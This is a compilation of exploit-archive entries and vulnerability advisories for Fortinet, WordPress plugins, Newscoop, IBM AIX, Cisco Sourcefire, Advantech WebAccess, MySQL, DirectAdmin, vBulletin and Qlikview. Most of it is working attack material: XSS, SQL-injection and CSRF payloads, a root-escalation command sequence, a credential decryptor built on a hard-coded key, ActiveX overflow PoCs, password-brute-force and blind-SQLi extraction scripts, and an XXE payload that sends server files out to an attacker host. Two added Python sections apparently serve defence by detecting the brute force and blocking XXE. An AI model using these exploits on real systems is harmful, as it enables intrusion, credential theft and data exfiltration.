
source: https://www.securityfocus.com/bid/56774/info

Multiple Fortinet FortiWeb Appliances are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

The following FortiWeb appliance series are vulnerable:

FortiWeb-4000C
FortiWeb-3000C/3000CFsx
FortiWeb-1000C
FortiWeb-400C and
FortiWeb Virtual Appliance 

https://www.example.com/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C

https://www.example.com/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0 
            
source: https://www.securityfocus.com/bid/56767/info

TinyMCPUK is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

TinyMCPUK 0.3 is vulnerable; other versions may also be affected. 

http://www.example.com/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script> 
            
source: https://www.securityfocus.com/bid/56777/info

The Zingiri Forums plugin for WordPress is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 

http://www.example.com/wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=[Directory or file] 
            
source: https://www.securityfocus.com/bid/56792/info

The Nest theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/themes/nest/gerador_galeria.php?codigo=[Sqli] 
            
source: https://www.securityfocus.com/bid/56800/info

Newscoop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Newscoop 4.0.2 is vulnerable; other versions may also be affected. 

Script: /admin/password_recovery.php
Payload: f_post_sent=1&f_email=example@example.com' and (select if(substr(password_reset_token,15,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password 
            
# Exploit Title: Wordpress White-Label Framework XSS
# Google Dork: inurl:/wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
# Date: 7 September 2015
# Exploit Author: Outlasted
# Software Link: wordpress.com / http://whitelabelframework.com/
# Version: 2.0.6
# Greetz to: TeaMp0isoN
=====================================================
Vulnerable url: /wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php


=====================================================
How to exploit?
----------------------------------------------------------------------------------------------------------

Enter your XSS payload in all forms and watch the magic.
            
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day

Let's kill some more bugs today and force vendor improvement :)

"""
$ cat /tmp/su
#!/bin/sh
/bin/sh
$ chmod +x /tmp/su
$ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
# /usr/bin/whoami
root
"""

References:
https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm

--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
--
            
/* 
Cisco Sourcefire User Agent Insecure File Permissions Vulnerability
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s): 
	Cisco SF User Agent 2.2
Fixed version(s):
	Cisco SF User Agent 2.2-25
Date: 08/09/2015
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco
BugId: CSCut44881

Disclosure Timeline:
18-03-2015: Vendor Notification
19-03-2015: Vendor Response/Feedback
01-09-2015: Vendor Fix/Patch
08-09-2015: Public Disclosure

Description: 
Sourcefire User Agent monitors Microsoft Active Directory servers and reports logins and logoffs authenticated via LDAP. 
The FireSIGHT System integrates these records with the information it collects via direct network traffic observation by managed devices. 

Vulnerability:
Sourcefire User Agent is vulnerable to default insecure file permissions and hard-coded encryption keys.
A local attacker can exploit this by gaining access to the user-readable database file and extracting sensitive information.
In combination with the hard-coded 3DES key, an attacker is able to decrypt the configured Domain Controller accounts, which can lead
to further attacks.

C:\Users\0x414141>icacls "C:\SourcefireUserAgent.sdf"
C:\SourcefireUserAgent.sdf BUILTIN\Administrators:(I)(F)
                           NT AUTHORITY\SYSTEM:(I)(F)
                           BUILTIN\Users:(I)(RX)
                           NT AUTHORITY\Authenticated Users:(I)(M)
                           Mandatory Label\High Mandatory Level:(I)(NW)

Successfully processed 1 files; Failed processing 0 files

*/

using System;
using System.Text;
using System.Security.Cryptography;
using System.Data.SqlServerCe;

namespace SFDecrypt
{
    class Program
    {

        static void Main(string[] args)
        {
            SqlCeConnection conn = null;
            try
            {
                string FileName = @"C:\SourcefireUserAgent.sdf";
                string ConnectionString = string.Format("DataSource=\"{0}\";Mode = Read Only;Temp Path =C:\\Windows\\Temp", FileName);
                conn = new SqlCeConnection(ConnectionString);
                string query = "Select host, domain, username, password FROM active_directory_servers";
                SqlCeCommand cmd = new SqlCeCommand(query, conn);
                conn.Open();
                SqlCeDataReader rdr = cmd.ExecuteReader();
                while (rdr.Read())
                {
                    string strHost = rdr.GetString(0);
                    string strDom = rdr.GetString(1);
                    string strUser = rdr.GetString(2);
                    string strPass = rdr.GetString(3);
                    Console.WriteLine("Host: " + strHost + " Domain: " + strDom + " Username: " + strUser + " Password: " + Decrypt.Decrypt3DES(strPass));
                }
                rdr.Close();
            }
            catch (Exception exception)
            {
                Console.Write(exception.ToString());
            }
            finally
            {
                // conn is still null if the connection object could not be created
                if (conn != null)
                    conn.Close();
            }
        }
    }

    class Decrypt
    {
        public static string Decrypt3DES(string strEncrypted)
        {

            string strDecrypted = "";
            try
            {
                TripleDESCryptoServiceProvider provider = new TripleDESCryptoServiceProvider();
                provider.Key = Encoding.UTF8.GetBytes("50uR<3F1r3R0xDaH0u5eW0o+");
                provider.IV = Encoding.UTF8.GetBytes("53cUri+y");
                byte[] inputBuffer = Convert.FromBase64String(strEncrypted);
                byte[] bytes = provider.CreateDecryptor().TransformFinalBlock(inputBuffer, 0, inputBuffer.Length);
                strDecrypted = Encoding.Unicode.GetString(bytes);
            }
            catch (Exception exception)
            {
                Console.Write("Error Decrypting Data: " + exception.Message);
            }
            return strDecrypted;
        }
    }
}
 

References:
https://tools.cisco.com/bugsearch/bug/CSCut44881
            
Introduction
*********************************************************************************
Advantech WebAccess is SCADA software used to remotely manage industrial
control system devices such as RTUs, generators and motors. Attackers can
execute code remotely by passing a maliciously crafted string to the
ConvToSafeArray API in the ASPVCOBJLib.AspDataDriven ActiveX control.

Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll
CVE-2014-9208

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX UpdateProject Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>

<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype  = "Sub UpdateProject ( ByVal WwwPort As String ,  ByVal ProjName As String ,  ByVal ProjIP As String ,  ByVal ProjPort As Long ,  ByVal ProjTimeout As Long ,  ByVal ProjDir As String )"
-->

arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"

target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6

</script></html>


*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function InterfaceFilter ( ByVal Interface As String ) As String"
-->

arg1=String(1044, "A")

target.InterfaceFilter arg1

</script></html>


*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX FileProcess Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Sub FileProcess ( ByVal Type As Integer ,  ByVal FileName As String )"
-->

arg1=1
arg2=String(1044, "A")

target.FileProcess arg1 ,arg2

</script></html>


*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function GetWideStrCpy ( ByVal Type As Integer ,  ByVal inStr As String ) As String"
-->

arg1=1
arg2=String(1044, "A")

target.GetWideStrCpy arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function GetRecipeInfo ( ByVal Type As Integer ,  ByVal filePath As String )"
-->

arg1=1
arg2=String(1044, "A")

target.GetRecipeInfo arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->

arg1=String(1044, "A")

target.GetLastTagNbr arg1

</script></html>

*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function ConvToSafeArray ( ByVal ArrSize As Integer ,  ByVal inStr As String )"
-->

arg1=1
arg2=String(2068, "A")

target.ConvToSafeArray arg1 ,arg2

</script></html>
*********************************************************************************
Vulnerabilities were reported to Advantech sometime in January/February
2015, coordinated through CSOC. From April 2015 they have been postponing the
fix.
            
source: https://www.securityfocus.com/bid/56837/info

MySQL and MariaDB are prone to a security-bypass weakness.

An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible. 

use Net::MySQL;

$|=1;

# One authenticated connection; every guess below is sent over it.
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'test',
    user     => "user",
    password => "secret",
    debug    => 0,
);

$crackuser = "crackme";

# Candidate passwords arrive one per line on stdin (e.g. from john --stdout).
while (<STDIN>) {
    chomp;
    $currentpass = $_;

    # Body of a COM_CHANGE_USER (0x11) packet: user, NUL, 20-byte scramble of
    # the guess against the salt from the original handshake, NUL.
    $vv = join "\0",
        $crackuser,
        "\x14" .
        Net::MySQL::Password->scramble(
            $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
        ) . "\0";
    if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
    }
}
---
example session:

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted
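The script above sends command 0x11, COM_CHANGE_USER, over one already-open connection for every candidate password, so connection-rate monitoring sees a single session; what does accumulate is one access-denied error per guess. The following is an added example, not from the advisory or the script: a detector that counts those errors per client host in a sliding window over MySQL error-log lines, assuming the server records them (log_warnings above 1 on 5.5-era servers); the log lines are constructed to mimic that format, not captured from a real server.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed error-log sample: a guessing burst against "crackme" from one
# host, plus a single mistyped password from another. The layout imitates a
# 5.5-era error log with log_warnings > 1; timestamps and hosts are made up.
SAMPLE_ERROR_LOG = (
    ["121205 10:00:01 [Note] /usr/sbin/mysqld: ready for connections."]
    + [
        ("121205 10:00:%02d [Warning] Access denied for user 'crackme'@'192.0.2.10' "
         "(using password: YES)") % (6 + i // 5)
        for i in range(12)
    ]
    + ["121205 10:00:09 [Warning] Access denied for user 'bob'@'198.51.100.4' (using password: YES)"]
)

DENIED_RE = re.compile(
    r"^(?P<ts>\d{6} +\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def parse_denials(lines):
    """Yield (timestamp, user, host) for every access-denied line; skip the rest."""
    for line in lines:
        m = DENIED_RE.match(line)
        if m:
            ts = datetime.strptime(" ".join(m.group("ts").split()), "%y%m%d %H:%M:%S")
            yield ts, m.group("user"), m.group("host")


def find_guessing_bursts(lines, threshold=10, window_seconds=60):
    """Return {host: {"count", "users", "first", "last"}} for every client host
    with at least `threshold` denials inside some `window_seconds` span.

    Counting per host rather than per connection is the point: the attack
    never opens a second connection, so this is what a connection-based
    limiter misses.
    """
    by_host = defaultdict(list)
    for ts, user, host in parse_denials(lines):
        by_host[host].append((ts, user))
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for host, events in by_host.items():
        events.sort()
        start = 0
        for end, (ts, _) in enumerate(events):
            # Slide the window start forward until it spans at most window_seconds.
            while ts - events[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold and count > alerts.get(host, {}).get("count", 0):
                alerts[host] = {
                    "count": count,
                    "users": sorted({u for _, u in events[start:end + 1]}),
                    "first": events[start][0],
                    "last": ts,
                }
    return alerts


if __name__ == "__main__":
    for host, info in find_guessing_bursts(SAMPLE_ERROR_LOG).items():
        print("%s: %d denials for %s between %s and %s"
              % (host, info["count"], ",".join(info["users"]), info["first"], info["last"]))
```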
            
source: https://www.securityfocus.com/bid/56860/info

The Simple Gmail Login plugin for WordPress is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

Simple Gmail Login 1.1.3 and prior are vulnerable.

Fatal error: Uncaught exception 'Exception' with message
'DateTimeZone::__construct() [<a
href='datetimezone.--construct'>datetimezone.--construct</a>]: Unknown or bad timezone ()' in
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php:229
Stack trace: #0
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(229): 
DateTimeZone->__construct('') #1
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(210): 
SimpleGmail_Plugin->log('Plugin activate...', false) #2 [internal
function]: SimpleGmail_Plugin->activate('') #3
C:\xampp\htdocs\wordpress\wp-includes\plugin.php(403): 
call_user_func_array(Array, Array) #4
C:\xampp\htdocs\wordpress\wp-admin\plugins.php(157): 
do_action('activate_simple...') #5 {main} thrown in C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php
on line 229
            
=============================================================================
[+] Exploit Title : DirectAdmin Web Control Panel CSRF/XSS vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Date : 2015/09/08
[+] Version : 1.483
[+] Tested on : Elementary Os
[+] Vendor Homepage : http://www.directadmin.com/
=============================================================================
[+] Introduction : 
DirectAdmin is a graphical web-based hosting control panel designed to make administration of websites easier.
DirectAdmin suffers from cross-site request forgery and cross-site scripting vulnerabilities.
=============================================================================
[+] CMD_FILE_MANAGER :
[+] Users : Users are web hosting clients.  They use DirectAdmin to configure their web site
[+] Exploit 1: Create New File and Edit a file
<form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="path" value="/domains/address/public_html">
<input type="hidden" name="text" value="<?php //codes ?>">
<input type="hidden" name="filename" value="index.php">
<input type="submit" onClick="save=0;" value="Save As">
</form>
 -----------------------------------------------------------------------------
[+] Exploit 2: Create a New Folder 
<form name=folderform action="/CMD_FILE_MANAGER" method="POST">
<input type="hidden" name="action" value="folder">
<input type="hidden" name="path" value="/domains/iceschool.ir/public_html">
<input type="hidden" name="name" value="Folder">
<input type="submit" value="Create">
</form>
 -----------------------------------------------------------------------------
[+] Exploit 3: Rename a file
<form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type=hidden name=action value="rename">
<input type="hidden" name="path" value="/domains/address/public_html">
<input type="hidden" name="old" value="Oldname">
<input type="hidden" name="filename" value="Newname">
<input type="hidden" name="overwrite" value="yes">
<input type="submit" value="Rename">
</form>
-----------------------------------------------------------------------------
[+] Exploit 4  : Reflected XSS 
<form name='info' action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="path" value='/xss/"><script>alert(/XSS Vuln/)</script>'>
<input type="hidden" name="text" value="xss">
<input type="hidden" name="filename" value="xss">
<input type="submit" onClick="save=0;" value="Save As">
</form>

=============================================================================
[+] CMD_FTP :
[+] Users : Users are web hosting clients.  They use DirectAdmin to configure their web site
[+] Exploit : Create FTP account
<form name="reseller" action="http://address:port/CMD_FTP" method="post">
<input style="display:none" type="text" name="fakeusernameremembered"/>
<input style="display:none" type="password" name="fakepasswordremembered"/>
<input type="hidden" name="action" value="create">
<input type="hidden" name="domain" value="domain.xyz"> <!-- Example : ashiyane.org -->
<input type="hidden" name="user" value="ehsan">
<input type="hidden" name="passwd" value="pass1234">
<input type="hidden" name="passwd2" value="pass1234">
<input type="hidden" name="type" value="domain" checked>
<input type="hidden" name="type" value="ftp">
<input type="hidden" name="type" value="user">
<input type="hidden" name="type" value="custom">
<input type="hidden"  name="custom_val" value="/home/domain"> <!-- Example : /home/ashiyane -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] CMD_DB :
[+] Users : Users are web hosting clients.  They use DirectAdmin to configure their web site
[+] Exploit : Create new Database
<form name=reseller action="http://address:port/CMD_DB" method="post">
<input type="hidden" name=action value=create>
<input type="hidden" name=domain value="domain.xyz"> <!-- Domain -->
<input type="hidden" name="name" value="dbname"> <!-- Database Name -->
<input type="hidden" name="user" value="ehsan"> <!-- Username -->
<input type="hidden" name="passwd" value="pass1234">  <!-- Password -->
<input type="hidden" name="passwd2" value="pass1234"> <!-- Password -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] CMD_EMAIL_FORWARDER :
[+] Users : Users are web hosting clients.  They use DirectAdmin to configure their web site
[+] Exploit : Create new E-Mail Forwarder
<form name=info action="CMD_EMAIL_FORWARDER" method="post">
<input type=hidden name=action value=create>
<input type=hidden name=domain value="domain.xyz"><!-- Domain -->
<input type="hidden" name="user" value="info"> <!-- Forwarder Name -->
<input type="hidden" name="email" value="hehsan979@gmail.com"> <!-- Destination Email -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] Discovered By : Ehsan Hosseini (hehsan979@gmail.com)
            
source: https://www.securityfocus.com/bid/56862/info

FOOT Gestion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20 
            
source: https://www.securityfocus.com/bid/56877/info

The ajaxReg module for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

#!/usr/bin/php
<?php

# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.example.com/watch?v=LlKaYyJxH7E
# check it : http://www.example.com/vBulletin/clientscript/register.js

function usage ()
{
    echo
        "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
        "\n[+] Author: Cold z3ro".
        "\n[+] Site  : http://www.example.com | www.example.com".
        "\n[+] vendor: http://www.example.com/forum/showthread.php?t=144869".
        "\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
        "\n[+] Ex.   : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
        "\n[+] Note. : Its a 0day exploit\n\n";
    exit ();
}

# Returns true when the response contains "Invalid", i.e. when the injected
# comparison for one character of $field held.
function check ($hostname, $path, $field, $pos, $usid, $char)
{
    $char = ord ($char);
    $inj = 'ajax.php?do=CheckUsername&param=';
    $inj .= "admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
    $url = $hostname.$path.$inj;
    $curl = curl_init();
    curl_setopt ($curl, CURLOPT_URL, $url);
    curl_setopt ($curl, CURLOPT_HEADER, 1);
    curl_setopt ($curl, CURLOPT_VERBOSE, 0);
    curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
    $con = curl_exec ($curl);
    curl_close ($curl);
    # eregi() was removed in PHP 7; a case-insensitive substring test is all it did here
    return $con !== false && stripos ($con, 'Invalid') !== false;
}


function brutechar ($hostname, $path, $field, $usid, $key)
{
    $pos = 1;
    $chr = 0;
    # Try every alphabet character at the current position; a hit prints it and
    # restarts the alphabet at the next position. The loop ends at the first
    # position where nothing matches.
    while ($chr < strlen ($key))
    {
        if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
        {
            echo $key [$chr];
            $chr = -1;
            $pos++;
        }
        $chr++;
    }
}


if (count ($argv) < 4)
    usage ();

$hostname = $argv [1];
$path = $argv [2];
$usid = $argv [3];
$key = isset ($argv [4]) ? $argv [4] : "";
if (empty ($key))
    $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

echo "[+] Username: ";
brutechar ($hostname, $path, "username", $usid, $key);
echo "\n[+] Password: ";
brutechar ($hostname, $path, "password", $usid, $key);
echo "\n[+] Done..";
echo "\n[+] It's not fake, its real.";
# word to 1337day.com, stop scamming me

?>
            
Exploit Title: Qlikview blind XXE security vulnerability
Product: Qlikview
Vulnerable Versions: v11.20 SR11 and previous versions
Tested Version: v11.20 SR4
Advisory Publication: 08/09/2015
Latest Update: 08/09/2015
Vulnerability Type: Improper Restriction of XML External Entity Reference [CWE-611]
CVE Reference: CVE-2015-3623
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------

Vendor: QLIK

Product & Version:
QlikView v11.20 SR4

Vendor URL & Download:
http://www.qlik.com/us/explore/products/qlikview

Product Description:
"The QlikView Business Discovery platform delivers true self-service BI that empowers business users by driving innovative decision-making."


(2) Vulnerability Details:
--------------------------
The Qlikview platform is vulnerable to XML External Entity (XXE) vulnerabilities. More specifically, the platform
is susceptible to DTD parameter injections, which are also "blind" as the server feeds back no visual response. These vulnerabilities can be exploited
to force Server-Side Request Forgery (SSRF) in multiple protocols, as well as to read and extract arbitrary files on the server directly.

Proof of concept for XXE [CVE-2015-5361]:
-----------------------------------------
URL: https://<QLIKVIEW>/AccessPoint.aspx

Attack Pattern for SSRF: 
------------------------
In POST body:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE update [
<!ENTITY % external SYSTEM "http://yourserver.com">
%external;]>

OR simply 
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://yourserver.com">

As this is a blind XXE, you will see no response from the server, but yourserver.com will receive the HTTP request from the Qlikview server. The same works with the FTP and HTTPS protocols.

Attack Pattern for reading and extracting arbitrary files: 
------------------------------------------
In POST body:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % remote SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yourserver.com/test.dtd">
%dtd;
%send;
]>

The test.dtd file on yourserver.com will need to contain the following:

Test.dtd
--------
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://yourserver.com/?%remote;'>">
%all;

As the response is blind, you will see no response from the server, but yourserver.com will receive the file contents as part of the URL in lieu of the %remote parameter.
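All three bodies above can be rejected before any parser resolves an entity. The following is an added example, not part of this advisory or of Qlik's code: a DTD policy check built on Python's standard-library expat parser, run against the advisory's own bodies (reconstructed here, with the file-read body ending in a well-formed "]>"), which flags external DTDs, external or parameter entities, and by default any DOCTYPE at all.

```python
import xml.parsers.expat as expat


def check_xml_body(data, allow_internal_dtd=False):
    """Return a list of (kind, detail) policy findings for the XML text `data`.

    An empty list means the body may go on to the real parser. Expat is told
    never to load parameter entities or the external DTD subset, and the
    external-entity hook refuses every reference, so this check performs no
    network or file access whatever the document asks for.
    """
    findings = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # A SYSTEM or PUBLIC identifier on the DOCTYPE is the remote-DTD form.
        if system_id or public_id:
            findings.append(("external_dtd", system_id or public_id))
        elif not allow_internal_dtd:
            findings.append(("doctype", name))

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        external = bool(system_id or public_id)
        target = "%s -> %s" % (name, system_id or public_id)
        if is_param and external:
            findings.append(("external_parameter_entity", target))
        elif is_param:
            # Internal parameter entities only build further DTD declarations;
            # a request body has no legitimate use for them.
            findings.append(("parameter_entity", name))
        elif external:
            findings.append(("external_entity", target))
        # Internal general entities (<!ENTITY x "text">) are left alone here.

    def on_external_ref(context, base, system_id, public_id):
        # Reached when element content references an external entity;
        # returning 0 makes expat abort instead of fetching it.
        findings.append(("external_entity_ref", system_id or public_id))
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError as err:
        # The advisory's bodies are bare DOCTYPEs with no root element, so
        # expat objects once the prolog ends; report that only if nothing
        # more specific was already found.
        if not findings:
            findings.append(("malformed", str(err)))
    return findings


def kinds(findings):
    """Finding kinds only, for logging and for the checks below."""
    return [kind for kind, _ in findings]


# Constructed bodies following the advisory's attack patterns (host and file
# names as written there; the file-read body ends in a well-formed "]>").
SSRF_PARAMETER_ENTITY = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE update [
<!ENTITY % external SYSTEM "http://yourserver.com">
%external;]>
"""
SSRF_PUBLIC_DTD = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://yourserver.com">
"""
FILE_READ = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % remote SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yourserver.com/test.dtd">
%dtd;
%send;
]>
"""
BENIGN = '<?xml version="1.0"?><update><user>alice</user></update>'
INTERNAL_ONLY = '<!DOCTYPE d [<!ENTITY greet "hello">]><d>&greet;</d>'

if __name__ == "__main__":
    samples = [("ssrf/param", SSRF_PARAMETER_ENTITY), ("ssrf/public", SSRF_PUBLIC_DTD),
               ("file read", FILE_READ), ("benign", BENIGN), ("internal dtd", INTERNAL_ONLY)]
    for label, body in samples:
        print("%-13s %s" % (label, kinds(check_xml_body(body)) or "ok"))
```

On ASP.NET, which the .aspx endpoint above indicates, the equivalent policy for readers created with `XmlReader.Create` is `XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit`.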


(3) Advisory Timeline:
----------------------
29/04/2015 - First Contact informing vendor of vulnerability
30/04/2015 - Response requesting details of vulnerability. Details sent
05/05/2015 - Vendor indicates issue is under investigation.
06/05/2015 - Vendor confirms vulnerability and has started working on resolving the issue.
20/05/2015 - Vendor confirms root cause has been identified and patch is under internal testing.
08/06/2015 - Vendor confirms patch ready and requests 90 day restraint on vulnerability release to give clients time to patch.
10/06/2015 - Patch 11.20 SR12 released, fixing the vulnerability
08/09/2015 - Public disclosure of vulnerability.


(4) Solution:
------------
Upgrading to QV11.20 SR12 corrects the vulnerability.


(5) Credits:
------------
Discovered by Alex Haynes

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3623
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3623
            
